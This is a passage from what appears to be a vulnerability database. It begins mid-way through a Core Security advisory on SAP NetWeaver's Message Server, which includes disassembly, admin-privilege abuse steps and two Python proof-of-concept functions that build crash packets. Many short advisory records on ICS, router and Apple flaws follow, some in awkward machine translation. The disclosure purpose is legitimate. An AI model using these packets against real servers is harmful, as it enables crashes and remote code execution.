be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4]. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -----/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----
var-201208-0222 Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability
var-202108-1148 An access issue was addressed with improved access restrictions. This issue is fixed in macOS Monterey 12.0.1. A malicious application may be able to access local users' Apple IDs. apple's macOS Exists in unspecified vulnerabilities.Information may be obtained. ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by the CVE program. Notes: none
var-200202-0006 Vulnerabilities in a large number of SNMP implementations allow remote attackers to cause a denial of service or gain privileges via SNMPv1 trap handling, as demonstrated by the PROTOS c06-SNMPv1 test suite. NOTE: It is highly likely that this candidate will be SPLIT into multiple candidates, one or more for each vendor. This and other SNMP-related candidates will be updated when more accurate information is available. Multiple vendor SNMPv1 Trap handling implementations contain vulnerabilities that may allow unauthorized privileged access, denial-of-service conditions, or unstable behavior . If your site uses SNMP in any capacity, the CERT/CC encourages you to read the information provided below. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ SNMP Protocol is status and performance information MIB (Management Information Base) Protocol used to exchange Management side SNMP Managers such as managed routers, switches and printers SNMP Communicates with management network devices called agents. Because of its wide acceptance in the market, SNMP Has become the standard for SNMP protocol version1 Is SNMPv1 Is the most widely implemented. this SNMPv1 Sent from the agent to the manager in the implementation of SNMP Trap message and sent from the manager to the agent SNMP Decrypt the request message / There are problems in interpreting. If this problem is used by an attacker, the following actions may be executed. Many other programs that you implement may also be affected because of a protocol problem. On the target host SNMP If the service is running, an attacker could execute arbitrary code ・ If a buffer overflow attack is feasible and a very long trap message SNMP If the host on which the service is running receives, the application may go into a denial of service state The effects described above vary from application to application. For details, refer to each product.Please refer to the “Overview” for the impact of this vulnerability. Windows 95 is prone to a denial-of-service vulnerability. MPE/iX is an Internet-ready operating system for the HP e3000 class servers. It is possible to crash the service by transmitting to it a maliciously constructed SNMPv1 request PDU. It was previously known as UCD-SNMP. They typically notify the manager that some event has occured or otherwise provide information about the status of the agent. Multiple vulnerabilities have been discovered in a number of SNMP implementations. The vulnerabilities are known to exist in the process of decoding and interpreting SNMP trap messages. Among the possible consequences are denial of service and allowing attackers to compromise target systems. These depend on the individual vulnerabilities in each affected product. HP has confirmed that large traps will cause OpenView Network Node Manager to crash. This may be due to an exploitable buffer overflow condition
var-202007-0395 Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities that are vulnerable to the use of an attacker-controlled string in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code. Advantech iView Has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put in a state. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech iView. Authentication is not required to exploit this vulnerability.The specific flaw exists within the NetworkServlet servlet. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise
var-201805-1147 WPLSoft in Delta Electronics versions 2.45.0 and prior utilizes a fixed length heap buffer where a value larger than the buffer can be read from a file into the buffer, causing the buffer to be overwritten, which may allow remote code execution or cause the application to crash. Delta Electronics WPLSoft Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of dvp files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. Delta Industrial Automation is the industry automation vendor for power management and cooling solutions worldwide. The length of the data provided by the user is not verified. WPLSoft (Delta PLC programming software) is a PLC program programming software used by Delta Electronics in the WINDOWS operating system environment. Delta Electronics WPLSoft has a heap buffer overflow vulnerability. Execute or cause the application to crash. A stack-based buffer-overflow vulnerability 2. A heap-based buffer-overflow vulnerability 3. Delta Industrial WPLSoft Version 2.45.0 and prior versions are vulnerable
var-201902-0647 LCDS Laquis SCADA prior to version 4.1.0.4150 allows execution of script code by opening a specially crafted report format file. This may allow remote code execution, data exfiltration, or cause a system crash. Script embedded in a crafted file can create files in arbitrary locations using the Ini.WriteString method. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the Memory.Integer method. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the aq process. LAquis SCADA is a suite of SCADA software for monitoring and data acquisition
var-201908-0863 Rockwell Automation Arena Simulation Software versions 16.00.00 and earlier contain a USE AFTER FREE CWE-416. A maliciously crafted Arena file opened by an unsuspecting user may result in the application crashing or the execution of arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of project files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. 9502-Ax) 16.00.00 and earlier versions have resource management error vulnerabilities. 9502-Ax) version 16.00.00 and earlier
var-201912-0120 A memory corruption issue was addressed with improved validation. This issue is fixed in Xcode 11.2. Processing a maliciously crafted file may lead to arbitrary code execution. apple's Xcode Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Apple Xcode is an integrated development environment provided by Apple (Apple) to developers. It is mainly used to develop applications for Mac OS X and iOS. LLVM (Low Level Virtual Machine) is a framework system of a framework compiler (compiler) developed by the LLVM team. A security vulnerability exists in LLVM components in versions of Apple Xcode prior to 11.2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2019-11-01-1 Xcode 11.2 Xcode 11.2 addresses the following: llvm Available for: macOS Mojave 10.14.4 and later Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2019-8800: Pan ZhenPeng of Qihoo 360 Nirvan Team CVE-2019-8806: Pan ZhenPeng of Qihoo 360 Nirvan Team Installation note: Xcode 11.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "11.2". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl27tlwACgkQBz4uGe3y 0M3xfA/6Ar1hsMVC9/i7vbHnKFv1nSo5k3dgl3t6UepPM2HW7YR9ngxKXW6r95DB hH9TELVnvluC15EfXbsB+OhcgIxCc8EJYvAs4Y+n34VL/A03WyIDaYB7/TO8NLaL Wh5O7/unhEijj+HhTiveS6x7Fimyw7WzVmLJvIoAN8EBXtvfWTA/VywAgHuX/aVB 2fdMOHDsVUI3a8SBzTSiHs6BM27TCoKx+FI3Ad+yABmxj+SykCfDcFOtxsyFhiBh m6fIPweMxXtKc3tZPQYLtu05UPoBlOclNiAbBt5I7jdd9uNekjLQFaMf+D+gGGZI BIILI1dCg+dQeDKPeMJsdSpcMqqyUvGfTzYW7JNQsGM1LFvS+8e7SLoCKJuIgosK dMkuK/kg05vOGgq6qFyGn/vDDXqoVpbFq+HN6tNU5i0ni8Y5vuE8ecttUJA6XTiA fF7U6AeSxQov5HS9RW8UzyCUktpPtiRuUYr3QWRpEoPsuWiPqvEprHe0FS+tJh3h Zkz42DV8gD5gogakX1oJpX+CTZa725WusiuFs0bdCkougssrGYaRnMe+YL7/Z6ej pAvNOGe4GesS0COGxkXgFK0w6VIC+SGVNdXkCudaYS+C4rklclVmXulKTavldUos D7ebNEuHgE2/H66H0A1zZf4YDP4KqVb/j2T15wiA4uYiU67jN94= =KAxM -----END PGP SIGNATURE-----
var-201912-0114 A memory corruption issue was addressed with improved validation. This issue is fixed in Xcode 11.2. Processing a maliciously crafted file may lead to arbitrary code execution. apple's Xcode Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Apple Xcode is an integrated development environment provided by Apple (Apple) to developers. It is mainly used to develop applications for Mac OS X and iOS. A security vulnerability exists in LLVM components in versions of Apple Xcode prior to 11.2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2019-11-01-1 Xcode 11.2 Xcode 11.2 addresses the following: llvm Available for: macOS Mojave 10.14.4 and later Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2019-8800: Pan ZhenPeng of Qihoo 360 Nirvan Team CVE-2019-8806: Pan ZhenPeng of Qihoo 360 Nirvan Team Installation note: Xcode 11.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "11.2". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl27tlwACgkQBz4uGe3y 0M3xfA/6Ar1hsMVC9/i7vbHnKFv1nSo5k3dgl3t6UepPM2HW7YR9ngxKXW6r95DB hH9TELVnvluC15EfXbsB+OhcgIxCc8EJYvAs4Y+n34VL/A03WyIDaYB7/TO8NLaL Wh5O7/unhEijj+HhTiveS6x7Fimyw7WzVmLJvIoAN8EBXtvfWTA/VywAgHuX/aVB 2fdMOHDsVUI3a8SBzTSiHs6BM27TCoKx+FI3Ad+yABmxj+SykCfDcFOtxsyFhiBh m6fIPweMxXtKc3tZPQYLtu05UPoBlOclNiAbBt5I7jdd9uNekjLQFaMf+D+gGGZI BIILI1dCg+dQeDKPeMJsdSpcMqqyUvGfTzYW7JNQsGM1LFvS+8e7SLoCKJuIgosK dMkuK/kg05vOGgq6qFyGn/vDDXqoVpbFq+HN6tNU5i0ni8Y5vuE8ecttUJA6XTiA fF7U6AeSxQov5HS9RW8UzyCUktpPtiRuUYr3QWRpEoPsuWiPqvEprHe0FS+tJh3h Zkz42DV8gD5gogakX1oJpX+CTZa725WusiuFs0bdCkougssrGYaRnMe+YL7/Z6ej pAvNOGe4GesS0COGxkXgFK0w6VIC+SGVNdXkCudaYS+C4rklclVmXulKTavldUos D7ebNEuHgE2/H66H0A1zZf4YDP4KqVb/j2T15wiA4uYiU67jN94= =KAxM -----END PGP SIGNATURE-----
var-202305-1589 D-Link DIR-2150 SetSysEmailSettings EmailTo Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20559. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-202407-0235 Delta Electronics CNCSoft-G2 lacks proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company
var-202407-0234 Delta Electronics CNCSoft-G2 lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company
var-202407-0233 Delta Electronics CNCSoft-G2 lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company
var-202407-0232 Delta Electronics CNCSoft-G2 lacks proper validation of user-supplied data, which can result in a memory corruption condition. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company
var-201112-0097 Stack-based buffer overflow in the CmpWebServer component in 3S CoDeSys 3.4 SP4 Patch 2 and earlier, as used on the ABB AC500 PLC and possibly other products, allows remote attackers to execute arbitrary code via a long URI to TCP port 8080. CoDeSys is a powerful PLC software programming tool that supports IEC61131-3 standard IL, ST, FBD, LD, CFC, SFC six PLC programming languages. The GatewayService has an integer overflow. The GatewayService uses the 32-bit value offset at the header 0x0c to specify the size of the received data. The program receives this value, increasing the number of 0x34 and allocating the amount of memory can cause an integer overflow. CmpWebServer is a component of the 3SRTESrv3 and CoDeSysControlService services for handling 8080 port connections. The function 0040f480 copies the input URI to a limited stack buffer, which can trigger a buffer overflow. 3S CoDeSys handles the Content-Length value in an HTTP POST request to trigger a null pointer reference. CoDeSys is prone to a stack-based buffer-overflow and an integer-overflow vulnerability. Failed attacks may cause a denial-of-service condition
var-201801-0152 An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27eb IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3
var-201801-0151 A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwprtscr utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
var-201807-0341 ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the IPAddress parameters of the ABB BEControlLogix OPC Driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland
var-201806-1058 Crestron TSW-1060, TSW-760, TSW-560, TSW-1060-NC, TSW-760-NC, and TSW-560-NC devices before 2.001.0037.001 allow unauthenticated remote code execution via a Bash shell service in Crestron Toolbox Protocol (CTP). This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Crestron's Android-based products. Authentication is required to exploit this vulnerability.The specific flaw exists within the ADDUSER command of the CTP console. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker could leverage this vulnerability to execute code with root privileges. CrestronTSW-1060 and other are touch screen devices of Crestron Electronics of the United States. There are security vulnerabilities in several Crestron products
var-201906-1029 In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. WebAccess/SCADA Is NULL A vulnerability related to pointer dereference exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 2. Multiple stack-based buffer-overflow vulnerabilities 3. Multiple heap-based buffer-overflow vulnerabilities 4. An information disclosure vulnerability 5. Multiple remote-code execution vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (â??../â??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. Advantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products
var-202004-0077 There are multiple ways an unauthenticated attacker could perform SQL injection on WebAccess/NMS (versions prior to 3.0.2) to gain access to sensitive information. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech WebAccess/NMS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the processing of calls to the handleTargetsByDeviceName method of the MibBrowser class. When parsing the deviceName parameter of the targets endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose file contents in the context of SYSTEM. Advantech WebAccess/NMS is a set of Web browser-based Network Management System (NMS) software package developed by China Taiwan Advantech Corporation. There is a SQL injection vulnerability in Advantech WebAccess/NMS versions earlier than 3.0.2
var-202206-2050 The affected product is vulnerable to multiple SQL injections, which may allow an unauthorized attacker to disclose information. Authentication is not required to exploit this vulnerability.The specific flaw exists within the NetworkServlet endpoint, which listens on TCP port 8080 by default. When parsing the PROP_GetCommunity and PROP_SetCommunity elements of the performSearchDevice action, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise
var-202305-1981 D-Link DIR-2150 SetSysEmailSettings AccountName Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20555. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-202305-0214 D-Link DIR-2640 HNAP LoginPassword Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-2640 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management interface, which listens on TCP port 80 by default. A specially crafted login request can cause authentication to succeed without providing proper credentials. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19549. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
var-202305-0130 D-Link DIR-2640 EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2640 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the EmailFrom parameter provided to the HNAP1 endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19550. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
